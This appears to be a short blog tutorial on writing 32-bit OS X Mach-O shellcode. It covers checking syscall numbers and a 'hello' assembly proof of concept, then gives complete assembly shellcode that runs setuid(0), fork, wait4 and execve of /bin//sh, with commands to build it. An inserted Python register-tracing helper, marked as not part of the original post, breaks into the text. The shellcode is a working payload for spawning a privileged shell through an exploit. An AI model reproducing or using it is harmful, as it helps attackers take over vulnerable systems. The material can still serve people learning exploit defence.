We will write a basic shellcode (setuid + fork + wait4 + execve) for the 32-bit Intel architecture.
The first step is to check the syscall.h file.
Kana:osx capi_x$ cat /usr/include/sys/syscall.h
#ifdef __APPLE_API_PRIVATE
#define SYS_syscall 0
#define SYS_exit 1
#define SYS_fork 2
#define SYS_read 3
#define SYS_write 4
#define SYS_open 5
#define SYS_close 6
#define SYS_wait4 7
This is a small proof of concept (a "hello girls" in asm) that demonstrates the feasibility of making system calls via INT 80h.
section .text
global _start
_start:
push len
push msg
push 0x1
mov eax, 0x4
sub esp, 0x4 ; Stack align
int 0x80 ; write
mov eax, 0x1
sub esp, 0x4
int 0x80 ; exit
section .data
msg db 'Hola nenas!', 0xa
len equ $ - msg
Kana:osx capi_x$ file hello
hello: Mach-O executable i386
Kana:osx capi_x$ ./hello
Hola nenas!
Looking at these results, the shellcode can be written like any other, taking care of esp and compiling for 32-bit Mach-O.
And here is the result, nothing really awesome, but surely useful someday :-)
section .text
global _start
_start:
xor eax, eax
push eax
push eax
mov al, 23
int 0x80 ; setuid
pop eax
inc eax
inc eax
int 0x80 ; fork
pop ebx
push eax
push ebx
push ebx
push ebx
push eax
xor eax, eax
mov al, 7
push eax
int 0x80 ; wait4
xor eax, eax
push eax
push 0x68732f2f ; //sh
push 0x6e69622f ; /bin
mov ebx, esp
push eax
push esp
push esp
push ebx
mov al, 0x3b
push eax
int 0x80 ; execve
I compile it with yasm, which also has 64-bit support :-)
yasm -f macho32 forkexecve32.s -o forkexecve32.o
ld -static forkexecve32.o -o forkexecve32
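To read a listing like the one above, here is an added analysis aid (example code, not from the original post): it tracks eax, ebx and the pushed stack through the instructions and names each int 0x80 from the syscall.h numbers shown earlier, accounting for the one-slot stack pad the BSD convention expects on 32-bit Mach-O. The syscall table and the symbolic register/label names it reports for values it cannot resolve are assumptions of the example.

```python
# Added analysis aid (not from the original post): track eax/ebx and the
# pushed stack through a 32-bit listing and name each int 0x80 using the
# page's syscall.h numbers plus setuid (23) and execve (0x3b).
SYSCALLS = {1: ("exit", 1), 2: ("fork", 0), 3: ("read", 3), 4: ("write", 3),
            5: ("open", 3), 6: ("close", 1), 7: ("wait4", 4),
            23: ("setuid", 1), 0x3b: ("execve", 3)}   # number: (name, argc)

def annotate_int80(listing):
    """Return [(name, [args])] for every int 0x80. i386 Mach-O BSD convention:
    number in eax, one 4-byte slot on top of the stack standing in for the
    return address, then the arguments. Unresolved values stay symbolic."""
    regs = {"eax": None, "ebx": None}
    stack, calls = [], []

    def val(tok):                  # immediate, tracked register, or symbol
        if tok in regs and regs[tok] is not None:
            return regs[tok]
        try:
            return int(tok, 0)
        except ValueError:
            return tok

    for raw in listing.splitlines():
        line = raw.split(";")[0].strip()             # drop comments
        if not line:
            continue
        op, _, rest = line.partition(" ")
        args = [a.strip() for a in rest.split(",")] if rest else []
        if op == "xor" and args[0] == args[1] and args[0] in regs:
            regs[args[0]] = 0
        elif op == "mov" and args[0] in regs:
            regs[args[0]] = val(args[1])
        elif op == "mov" and args[0] == "al":        # low byte only
            eax = regs["eax"]
            regs["eax"] = (eax & ~0xff) | (val(args[1]) & 0xff) if isinstance(eax, int) else None
        elif op == "inc" and isinstance(regs.get(args[0]), int):
            regs[args[0]] += 1
        elif op == "push":
            stack.append(val(args[0]))
        elif op == "pop":
            v = stack.pop() if stack else None
            if args[0] in regs:
                regs[args[0]] = v
        elif op == "sub" and args[0] == "esp":       # hand-made pad slot(s)
            stack.extend(["<pad>"] * (int(args[1], 0) // 4))
        elif op == "int" and val(args[0]) == 0x80:
            name, argc = SYSCALLS.get(regs["eax"], ("unknown", 0))
            calls.append((name, list(reversed(stack[-1 - argc:-1]))))
            regs["eax"] = None                       # return value not modeled
    return calls
```

Run it on the two listings above: the hello program resolves to write(1, msg, len) followed by exit, and the shellcode to setuid(0), fork, wait4(pid, 0, 0, 0) and execve, each argument read from below the pad slot.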
Happy Hacking!
–
“No user serviceable parts included.”